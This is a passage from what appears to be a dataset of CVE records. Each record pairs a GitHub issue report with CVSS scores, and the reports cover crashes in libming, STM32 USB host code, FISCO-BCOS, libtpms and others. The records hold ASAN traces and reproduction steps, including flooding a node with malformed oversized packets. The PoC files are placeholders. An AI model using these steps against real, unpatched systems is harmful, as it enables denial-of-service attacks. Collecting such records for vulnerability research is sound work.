  68154. "description": "No checking on both IN and OUT pipe constructed. Describe the set up Software: APITAG MCU & MPU Packages Version: APITAG Verification Hardware Platform: STM NUMBERTAG H7B3 Describe the bug Function: static APITAG APITAG phost) Location: From line NUMBERTAG to line NUMBERTAG in FILETAG Type: Denial of Service. Result: The system will hang when try to communicate with the endpoint. Description: The function APITAG inits the status of MSC handler. It initializes the IN endpoint and OUT endpoint as shown from line NUMBERTAG to line NUMBERTAG in FILETAG However, when the variable APITAG of endpoint descriptor are both masked as IN or OUT without checking as shown in URLTAG the MSC handler will also only initialize the IN or OUT part as shown from line NUMBERTAG to line NUMBERTAG in FILETAG How To Reproduce NUMBERTAG Running APITAG application on the STM NUMBERTAG H7B3I platform NUMBERTAG Plug a USB disk NUMBERTAG Use the attached FILETAG to replace the USB device packet. FILETAG Additional context To patch it, the program should check both IN and OUT pipe is constructed.",
  68155. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  68156. "severity": "MEDIUM",
  68157. "baseScore": 4.6,
  68158. "impactScore": 3.6,
  68159. "exploitabilityScore": 0.9
  68160. },
  68161. {
  68162. "CVE_ID": "CVE-2021-34268",
  68163. "Issue_Url_old": "https://github.com/STMicroelectronics/STM32CubeH7/issues/75",
  68164. "Issue_Url_new": "https://github.com/stmicroelectronics/stm32cubeh7/issues/75",
  68165. "Repo_new": "stmicroelectronics/stm32cubeh7",
  68166. "Issue_Created_At": "2020-10-14T22:33:50Z",
  68167. "description": "No validity chekcing on dev_desc APITAG Describe the set up Software: APITAG MCU & MPU Packages Version: APITAG Verification Hardware Platform: STM NUMBERTAG H7B3 Describe the bug Function: static void APITAG dev_desc, uint8_t buf, uint NUMBERTAG t length) Location: URLTAG Type: Denial of Service. Result: A malformed USB device packet may cause the system hang when it tries to communicate with the outside world. Description: The function APITAG parses the device descriptor by input data from a USB device. The valid max packet size of the device descriptor should be NUMBERTAG and NUMBERTAG as USB specification required. However, the function APITAG doesn\u2019t check the value of dev_desc APITAG as shown in URLTAG The variable dev_desc APITAG will be used as the size to construct the control pipe between host and device as shown in URLTAG If APITAG is zero, the firmware will get the error status USBH_FAIL in the function APITAG called by the function APITAG when trying to communicate with the outside world by IN and OUT pipe in the future and the host will try to re enumerate. This process will loop again and again. How To Reproduce NUMBERTAG Running APITAG application on the STM NUMBERTAG H7B3I platform NUMBERTAG Plug a usb disk NUMBERTAG Use the attached FILETAG to replace USB device packet Additional context If you have a first analysis or patch correction, thank you to share your proposal. To patch it, the program should check if dev_desc APITAG is equal to NUMBERTAG or NUMBERTAG At least, it should be greater than zero. FILETAG",
  68168. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  68169. "severity": "MEDIUM",
  68170. "baseScore": 4.6,
  68171. "impactScore": 3.6,
  68172. "exploitabilityScore": 0.9
  68173. },
  68174. {
  68175. "CVE_ID": "CVE-2021-34338",
  68176. "Issue_Url_old": "https://github.com/libming/libming/issues/201",
  68177. "Issue_Url_new": "https://github.com/libming/libming/issues/201",
  68178. "Repo_new": "libming/libming",
  68179. "Issue_Created_At": "2020-08-24T13:27:16Z",
  68180. "description": "Segmentation fault in function APITAG APITAG Hi, there. There is a segmentation fault in the newest master branch NUMBERTAG aee NUMBERTAG Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: FILETAG Here is the reproduce trace reported by ASAN NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG ef NUMBERTAG bp NUMBERTAG c NUMBERTAG fb sp NUMBERTAG ffee NUMBERTAG T NUMBERTAG ef NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG b in APITAG PATHTAG NUMBERTAG b NUMBERTAG b in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG d9 in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG APITAG NUMBERTAG ABORTING ~~~~ The cause is due to the incomplete check in line NUMBERTAG mentioned in the Figure. APITAG",
  68181. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68182. "severity": "MEDIUM",
  68183. "baseScore": 6.5,
  68184. "impactScore": 3.6,
  68185. "exploitabilityScore": 2.8
  68186. },
  68187. {
  68188. "CVE_ID": "CVE-2021-34339",
  68189. "Issue_Url_old": "https://github.com/libming/libming/issues/202",
  68190. "Issue_Url_new": "https://github.com/libming/libming/issues/202",
  68191. "Repo_new": "libming/libming",
  68192. "Issue_Created_At": "2020-08-24T13:33:55Z",
  68193. "description": "Segmentation fault in function APITAG APITAG Hi, there. There is a segmentation fault in the newest master branch NUMBERTAG aee NUMBERTAG Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: FILETAG Here is the reproduce trace reported by ASAN NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG d8dc bp NUMBERTAG fffd NUMBERTAG f NUMBERTAG sp NUMBERTAG ffe NUMBERTAG f8bb0 T NUMBERTAG d8db in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG d9 in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fe9f9c NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG APITAG NUMBERTAG ABORTING ~~~~ The cause is due to the uncheck index of act APITAG mentioned in Figure. APITAG",
  68194. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68195. "severity": "MEDIUM",
  68196. "baseScore": 6.5,
  68197. "impactScore": 3.6,
  68198. "exploitabilityScore": 2.8
  68199. },
  68200. {
  68201. "CVE_ID": "CVE-2021-34340",
  68202. "Issue_Url_old": "https://github.com/libming/libming/issues/203",
  68203. "Issue_Url_new": "https://github.com/libming/libming/issues/203",
  68204. "Repo_new": "libming/libming",
  68205. "Issue_Created_At": "2020-08-25T10:33:55Z",
  68206. "description": "Segmentation fault in function APITAG decompile.c NUMBERTAG Hi, there. There is a segmentation fault in the newest master branch NUMBERTAG aee NUMBERTAG Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: FILETAG Here is the reproduce trace reported by ASAN NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG c bp NUMBERTAG f0 sp NUMBERTAG ffdbd NUMBERTAG ccf0 T NUMBERTAG b in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG d9 in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fd NUMBERTAG eb NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG APITAG NUMBERTAG ABORTING ~~~~ The cause might due to the incomplete check related to the index for array regs. APITAG",
  68207. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68208. "severity": "MEDIUM",
  68209. "baseScore": 6.5,
  68210. "impactScore": 3.6,
  68211. "exploitabilityScore": 2.8
  68212. },
  68213. {
  68214. "CVE_ID": "CVE-2021-34341",
  68215. "Issue_Url_old": "https://github.com/libming/libming/issues/204",
  68216. "Issue_Url_new": "https://github.com/libming/libming/issues/204",
  68217. "Repo_new": "libming/libming",
  68218. "Issue_Created_At": "2020-08-25T10:45:49Z",
  68219. "description": "Buffer overflow in APITAG APITAG Hi, there. There is a buffer overflow in the newest master branch NUMBERTAG aee NUMBERTAG Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: FILETAG Here is the reproduce trace reported by ASAN NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG e NUMBERTAG dc NUMBERTAG at pc NUMBERTAG d NUMBERTAG bp NUMBERTAG ffd NUMBERTAG c NUMBERTAG sp NUMBERTAG ffd NUMBERTAG c NUMBERTAG READ of size NUMBERTAG at NUMBERTAG e NUMBERTAG dc NUMBERTAG thread T NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG c5c in APITAG PATHTAG NUMBERTAG c5c in APITAG PATHTAG NUMBERTAG d3d4 in APITAG PATHTAG NUMBERTAG d3d4 in APITAG PATHTAG NUMBERTAG c NUMBERTAG b in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f8b NUMBERTAG e NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG NUMBERTAG e NUMBERTAG dc NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f8b NUMBERTAG fa in __interceptor_calloc ( PATHTAG NUMBERTAG e4cc in APITAG PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG APITAG Shadow bytes around the buggy address NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG c1c7fff9b NUMBERTAG fa[fa]fa fa fa fa fa fa fd fd fd fd fd fd fd fd NUMBERTAG c1c7fff9ba0: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa NUMBERTAG c1c7fff9bb0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c1c7fff9bc0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa 
NUMBERTAG c1c7fff9bd NUMBERTAG c1c7fff9be NUMBERTAG fa fa fa fa fa fa fa fa fd fd fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING ~~~~",
  68220. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68221. "severity": "MEDIUM",
  68222. "baseScore": 6.5,
  68223. "impactScore": 3.6,
  68224. "exploitabilityScore": 2.8
  68225. },
  68226. {
  68227. "CVE_ID": "CVE-2021-34342",
  68228. "Issue_Url_old": "https://github.com/libming/libming/issues/205",
  68229. "Issue_Url_new": "https://github.com/libming/libming/issues/205",
  68230. "Repo_new": "libming/libming",
  68231. "Issue_Created_At": "2020-08-25T10:55:36Z",
  68232. "description": "Buffer overflow in APITAG APITAG Hi, there. There is a buffer overflow in the newest master branch NUMBERTAG aee NUMBERTAG which causes a huge memory information leakage. Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: FILETAG Here is the reproduce trace reported by ASAN NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG f2f NUMBERTAG b bp NUMBERTAG ffcf NUMBERTAG sp NUMBERTAG ffcf NUMBERTAG b NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG f2f NUMBERTAG a in strlen ( PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG db7 in APITAG PATHTAG NUMBERTAG db7 in APITAG PATHTAG NUMBERTAG d3d4 in APITAG PATHTAG NUMBERTAG d3d4 in APITAG PATHTAG NUMBERTAG c NUMBERTAG b in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f2f NUMBERTAG cc NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f2f NUMBERTAG c1 in realloc ( PATHTAG NUMBERTAG b7b in APITAG PATHTAG SUMMARY: APITAG heap buffer overflow NUMBERTAG strlen Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fffcc NUMBERTAG c NUMBERTAG fffcc NUMBERTAG c NUMBERTAG fffcca NUMBERTAG c NUMBERTAG fffccb NUMBERTAG c NUMBERTAG fffccc NUMBERTAG c NUMBERTAG fffccd0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffcce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffccf0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fffcd NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fffcd NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fffcd NUMBERTAG fd fd fd fd fd fd 
fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING ~~~~",
  68233. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  68234. "severity": "MEDIUM",
  68235. "baseScore": 6.5,
  68236. "impactScore": 3.6,
  68237. "exploitabilityScore": 2.8
  68238. },
  68239. {
  68240. "CVE_ID": "CVE-2021-34539",
  68241. "Issue_Url_old": "https://github.com/CubeCoders/AMP/issues/464",
  68242. "Issue_Url_new": "https://github.com/cubecoders/amp/issues/464",
  68243. "Repo_new": "cubecoders/amp",
  68244. "Issue_Created_At": "2021-06-10T09:46:57Z",
  68245. "description": "Security: Insufficient validation on Java Version setting.. This was originally reported by Joel Frederick Lewis We are awaiting a CVE number for this issue. Bug Report System Information Windows, Linux PATHTAG B2 Development I confirm: [x] that I have searched for an existing bug report for this issue. [x] that I am using the latest available version of AMP. [x] that my operating system is up to date. Symptoms The APITAG Version' setting within AMP doesn't validate its setting in the way you'd expect for a potentially sensitive setting. Reproduction Alter the path to Java by using the Inspect Element tool in a browser for a given setting. Notes Because of the authentication and permissions requirements (users with this combination would reasonably be expected to have a high level of access to the host) this is regarded as a low risk, but potentially high impact issue. Instances running inside Docker aren't affected in the same way since they would not affect the host system.",
  68246. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  68247. "severity": "HIGH",
  68248. "baseScore": 7.2,
  68249. "impactScore": 5.9,
  68250. "exploitabilityScore": 1.2
  68251. },
  68252. {
  68253. "CVE_ID": "CVE-2021-34555",
  68254. "Issue_Url_old": "https://github.com/trusteddomainproject/OpenDMARC/issues/179",
  68255. "Issue_Url_new": "https://github.com/trusteddomainproject/opendmarc/issues/179",
  68256. "Repo_new": "trusteddomainproject/opendmarc",
  68257. "Issue_Created_At": "2021-06-08T09:47:15Z",
  68258. "description": "APITAG NUMBERTAG segfault several times on two VMs, APITAG NUMBERTAG Hi, yesterday and today APITAG has crashed for segfault half a dozen times on two virtual machines, one of them APITAG another APITAG both up to date and have APITAG version NUMBERTAG Until yesterday APITAG has worked fine. Last dmesg info was ERRORTAG Red Hat Abrtd service was running, there is coredump and other files saved by it. Is there some additional information you would need to investigate the issue? The package version is opendmarc NUMBERTAG APITAG on APITAG and opendmarc NUMBERTAG APITAG on APITAG",
  68259. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  68260. "severity": "HIGH",
  68261. "baseScore": 7.5,
  68262. "impactScore": 3.6,
  68263. "exploitabilityScore": 3.9
  68264. },
  68265. {
  68266. "CVE_ID": "CVE-2021-34801",
  68267. "Issue_Url_old": "https://github.com/xCss/Valine/issues/366",
  68268. "Issue_Url_new": "https://github.com/xcss/valine/issues/366",
  68269. "Repo_new": "xcss/valine",
  68270. "Issue_Created_At": "2021-06-16T04:11:40Z",
  68271. "description": "Found a fatal bug that can kill the comment system. \u5982\u679c\u60a8\u60f3\u62a5\u544a\u9519\u8bef\uff0c\u8bf7\u63d0\u4f9b\u4ee5\u4e0b\u4fe1\u606f If you want to report a bug, please provide the following information: \u53ef\u590d\u73b0\u95ee\u9898\u7684\u6b65\u9aa4 The steps to reproduce. The latest version of valine is APITAG first look at the effect of normal page loading comments: FILETAG When the commented user UA is incomplete\uff0csuch as\uff1a APITAG FILETAG This will cause the entire comment system of the current page to be damaged and the comments cannot be loaded normally FILETAG \u53ef\u590d\u73b0\u95ee\u9898\u7684\u7f51\u9875\u5730\u5740 FILETAG This website uses the latest version of valine, the comment cannot be loaded normally APITAG Valine NUMBERTAG PATHTAG Browser: APITAG \u603b\u7684\u6765\u8bf4\u5c31\u662f \u5982\u679c\u6709\u7528\u6237\u6076\u610f\u4fee\u6539 UA NUMBERTAG leancloud \u4ece\u91cc\u5230\u5916\u6392\u67e5\u4e86\u4e00\u904d \u624d\u53d1\u73b0\u4e86\u8fd9\u4e2a BUG\uff0c\u5e0c\u671b\u4f5c\u8005\u5927\u5927\u540e\u9762\u53ef\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5c34\u5c2c\u7684\u95ee\u9898",
  68272. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  68273. "severity": "MEDIUM",
  68274. "baseScore": 5.3,
  68275. "impactScore": 1.4,
  68276. "exploitabilityScore": 3.9
  68277. },
  68278. {
  68279. "CVE_ID": "CVE-2021-3496",
  68280. "Issue_Url_old": "https://github.com/Matthias-Wandel/jhead/issues/33",
  68281. "Issue_Url_new": "https://github.com/matthias-wandel/jhead/issues/33",
  68282. "Repo_new": "matthias-wandel/jhead",
  68283. "Issue_Created_At": "2021-04-13T03:00:34Z",
  68284. "description": "FILETAG Verification steps\uff1a APITAG the source code of jhead Edit file makefile CODETAG APITAG the jhead APITAG NUMBERTAG run jhead APITAG asan info ERRORTAG Thanks",
  68285. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  68286. "severity": "HIGH",
  68287. "baseScore": 7.8,
  68288. "impactScore": 5.9,
  68289. "exploitabilityScore": 1.8
  68290. },
  68291. {
  68292. "CVE_ID": "CVE-2021-3502",
  68293. "Issue_Url_old": "https://github.com/lathiat/avahi/issues/338",
  68294. "Issue_Url_new": "https://github.com/lathiat/avahi/issues/338",
  68295. "Repo_new": "lathiat/avahi",
  68296. "Issue_Created_At": "2021-04-26T17:05:33Z",
  68297. "description": "Reachable assertion in APITAG when trying to resolve badly formatted hostnames ( CVETAG ). Hi An issue was reported in Debian as CVETAG which got CVETAG assigned. Quoting the report: CODETAG",
  68298. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  68299. "severity": "MEDIUM",
  68300. "baseScore": 5.5,
  68301. "impactScore": 3.6,
  68302. "exploitabilityScore": 1.8
  68303. },
  68304. {
  68305. "CVE_ID": "CVE-2021-35041",
  68306. "Issue_Url_old": "https://github.com/FISCO-BCOS/FISCO-BCOS/issues/1951",
  68307. "Issue_Url_new": "https://github.com/fisco-bcos/fisco-bcos/issues/1951",
  68308. "Repo_new": "fisco-bcos/fisco-bcos",
  68309. "Issue_Created_At": "2021-06-15T12:05:29Z",
  68310. "description": "The node may have a bug when dealing with unformatted packet and lead to a crash. Describe the bug A malicious node can send a packet continuously. The packet is in an incorrect format and cannot be decoded by the node correctly. As a result, the node may consume the memory sustainably, as the flowing figure shows: FILETAG After NUMBERTAG seconds, over NUMBERTAG MB memory has been consumed. If I continue sending the packet, the node will consume all the memory. At last it be killed by the OS. In order to analyze the reason for this bug, I try to debug the code of the node. Here is what I found: First, I found that in the file APITAG , at line NUMBERTAG in the function decode : CODETAG the variable size is NUMBERTAG and the variable APITAG is a very big number under my packet. So the function will return APITAG whose value is NUMBERTAG The variable which accepts the return value is result in APITAG at line NUMBERTAG in the function APITAG : APITAG and the program will enter into a if else cluse: CODETAG Because the value of result is NUMBERTAG so here the program will call the function APITAG recursively. If I delete this call, the problem will not occur anymore. APITAG So I think the reason maybe the developers forget to release certain memory before the return statement if the packet is not decoded correctly! To Reproduce Steps to reproduce the behavior NUMBERTAG Construct a P2P packet which claims to have a big length (set a big value for variable APITAG NUMBERTAG Continuously send the packet to a running node NUMBERTAG The node will consume the memory continuously and crash. Expected behavior By handling the abnormal packets correctly, the memory cost will not sustainably increase and the node will not crash. Screenshots I have give the screenshots of the memory usage of the node in the description part. Environment (please complete the following information): OS: Ubuntu NUMBERTAG FISCO BCOS Version NUMBERTAG Additional context None!",
  68311. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  68312. "severity": "HIGH",
  68313. "baseScore": 7.5,
  68314. "impactScore": 3.6,
  68315. "exploitabilityScore": 3.9
  68316. },
  68317. {
  68318. "CVE_ID": "CVE-2021-3505",
  68319. "Issue_Url_old": "https://github.com/stefanberger/libtpms/issues/183",
  68320. "Issue_Url_new": "https://github.com/stefanberger/libtpms/issues/183",
  68321. "Repo_new": "stefanberger/libtpms",
  68322. "Issue_Created_At": "2021-02-17T11:08:16Z",
  68323. "description": "[libtpms NUMBERTAG APITAG creates prime numbers with NUMBERTAG zeros bits. Describe the bug When running APITAG on swtpm with libtpms NUMBERTAG to generate an RSA NUMBERTAG key, the modulus of the key always contains many zeros in its high bits. By extracting the prime factors from file holding the persistent TPM state, they always have NUMBERTAG bits set to zero. For example: Modulus CODETAG First prime number CODETAG Second prime number CODETAG APITAG the eight APITAG hexdigits after the NUMBERTAG first hexdigits of the prime numbers). This is due to a bug in function APITAG URLTAG The issue is that on NUMBERTAG bit systems, MASK is not APITAG but APITAG when APITAG is NUMBERTAG so only the NUMBERTAG lowest bits of APITAG are kept instead of the NUMBERTAG lowest bits. More precisely, in APITAG , the shift operand should have been APITAG . This bug is present in TCG specification ( APITAG section APITAG ). This specification was updated and the current version does not have this bug ( APITAG section APITAG ). This new version was implemented in April NUMBERTAG in APITAG (branch master ) but no release of libtpms includes the new version yet. Therefore I have three questions: Could APITAG be fixed in branch APITAG so that generating new RSA keys do not use prime numbers with many zeros, on NUMBERTAG bit systems? If no, could a comment be added which clearly state that this prime number generator generates prime numbers that have NUMBERTAG bits always set to zero and that the TCG already fixed this issue in a newer version of APITAG Platform Module Library Family NUMBERTAG Specification Part NUMBERTAG Routines Code\"? When will the next release of libtpms (version APITAG ?) occur? 
To Reproduce Steps to reproduce the behavior NUMBERTAG On Arch Linux on an NUMBERTAG system, install swtpm , APITAG and APITAG NUMBERTAG Launch swtpm in TPM2 mode and APITAG , for example with: CODETAG NUMBERTAG Generate a persistent RSA key on the software TPM, for example with: CODETAG NUMBERTAG Analyze the content of APITAG to retrieve the modulus and the prime numbers of the generated RSA key. Expected behavior APITAG should create an RSA key with prime numbers which really look random, instead of with NUMBERTAG bits always set to zero. Desktop (please complete the following information): OS: Arch Linux on an NUMBERTAG CPU NUMBERTAG bit system) Versions of relevant components libtpms NUMBERTAG swtpm NUMBERTAG",
  68324. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  68325. "severity": "MEDIUM",
  68326. "baseScore": 5.5,
  68327. "impactScore": 3.6,
  68328. "exploitabilityScore": 1.8
  68329. },
  68330. {
  68331. "CVE_ID": "CVE-2021-3508",
  68332. "Issue_Url_old": "https://github.com/enferex/pdfresurrect/issues/17",
  68333. "Issue_Url_new": "https://github.com/enferex/pdfresurrect/issues/17",
  68334. "Repo_new": "enferex/pdfresurrect",
  68335. "Issue_Created_At": "2021-04-16T08:58:58Z",
  68336. "description": "Infinite loop in function get_xref_linear_skipped in pdf.c. version NUMBERTAG b commit af NUMBERTAG OS: ubuntu NUMBERTAG CODETAG If 'trailer' is found, then look backwards for 'xref'. But if there is no character 'x', the function APITAG will go into an infinite loop. poc (zipped): FILETAG To reproduce: ./pdfresurrect [poc]",
  68337. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68338. "severity": "MEDIUM",
  68339. "baseScore": 5.5,
  68340. "impactScore": 3.6,
  68341. "exploitabilityScore": 1.8
  68342. },
  68343. {
  68344. "CVE_ID": "CVE-2021-3514",
  68345. "Issue_Url_old": "https://github.com/389ds/389-ds-base/issues/4711",
  68346. "Issue_Url_new": "https://github.com/389ds/389-ds-base/issues/4711",
  68347. "Repo_new": "389ds/389-ds-base",
  68348. "Issue_Created_At": "2021-04-01T14:35:42Z",
  68349. "description": "SIGSEGV with sync_repl. Issue Description When running a sync_repl client, it crashes current master APITAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG b NUMBERTAG abb (pc NUMBERTAG f2c NUMBERTAG c6c NUMBERTAG d bp NUMBERTAG f2be7fc3d NUMBERTAG sp NUMBERTAG f2be7fc3d NUMBERTAG T NUMBERTAG APITAG signal is caused by a READ memory access NUMBERTAG f2c NUMBERTAG c6c NUMBERTAG c in slapi_value_get_string PATHTAG NUMBERTAG f2c NUMBERTAG in sync_create_state_control PATHTAG NUMBERTAG f2c NUMBERTAG a NUMBERTAG f in sync_srch_refresh_pre_entry PATHTAG NUMBERTAG f2c NUMBERTAG bb NUMBERTAG in plugin_call_func PATHTAG NUMBERTAG f2c NUMBERTAG bb6fb6 in plugin_call_list PATHTAG NUMBERTAG f2c NUMBERTAG baf NUMBERTAG c in plugin_call_plugins PATHTAG NUMBERTAG f2c NUMBERTAG bf9a6a in send_ldap_search_entry_ext PATHTAG NUMBERTAG f2c NUMBERTAG bf NUMBERTAG e6 in send_ldap_search_entry PATHTAG NUMBERTAG f2c NUMBERTAG b NUMBERTAG in send_entry PATHTAG NUMBERTAG f2c NUMBERTAG b NUMBERTAG in iterate PATHTAG NUMBERTAG f2c NUMBERTAG b NUMBERTAG b in send_results_ext PATHTAG NUMBERTAG f2c NUMBERTAG b7fffe in op_shared_search PATHTAG NUMBERTAG b1 in do_search PATHTAG NUMBERTAG c7 in connection_dispatch_operation PATHTAG NUMBERTAG a5f5 in connection_threadmain PATHTAG NUMBERTAG f2c NUMBERTAG b NUMBERTAG APITAG NUMBERTAG f2c NUMBERTAG de4e1 in start_thread APITAG NUMBERTAG f2c NUMBERTAG a2 in clone APITAG APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in slapi_value_get_string Thread T NUMBERTAG created by T0 here NUMBERTAG f2c NUMBERTAG de NUMBERTAG in pthread_create APITAG NUMBERTAG f2c NUMBERTAG a APITAG APITAG Package Version and Platform: Platform: fedora Steps to Reproduce Steps to reproduce the behavior NUMBERTAG run sync_repl suite NUMBERTAG start standalone NUMBERTAG launch: ldapsearch ... E sync=rp b 'cn=config' APITAG Expected results Should not crash",
  68350. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  68351. "severity": "MEDIUM",
  68352. "baseScore": 6.5,
  68353. "impactScore": 3.6,
  68354. "exploitabilityScore": 2.8
  68355. },
  68356. {
  68357. "CVE_ID": "CVE-2021-35196",
  68358. "Issue_Url_old": "https://github.com/olivierkes/manuskript/issues/891",
  68359. "Issue_Url_new": "https://github.com/olivierkes/manuskript/issues/891",
  68360. "Repo_new": "olivierkes/manuskript",
  68361. "Issue_Created_At": "2021-06-17T17:52:17Z",
  68362. "description": "Possible security issue. Hi, do you have a process for reporting a possible security issue with Manuskript?",
  68363. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  68364. "severity": "HIGH",
  68365. "baseScore": 7.8,
  68366. "impactScore": 5.9,
  68367. "exploitabilityScore": 1.8
  68368. },
  68369. {
  68370. "CVE_ID": "CVE-2021-35265",
  68371. "Issue_Url_old": "https://github.com/maxsite/cms/issues/414",
  68372. "Issue_Url_new": "https://github.com/maxsite/cms/issues/414",
  68373. "Repo_new": "maxsite/cms",
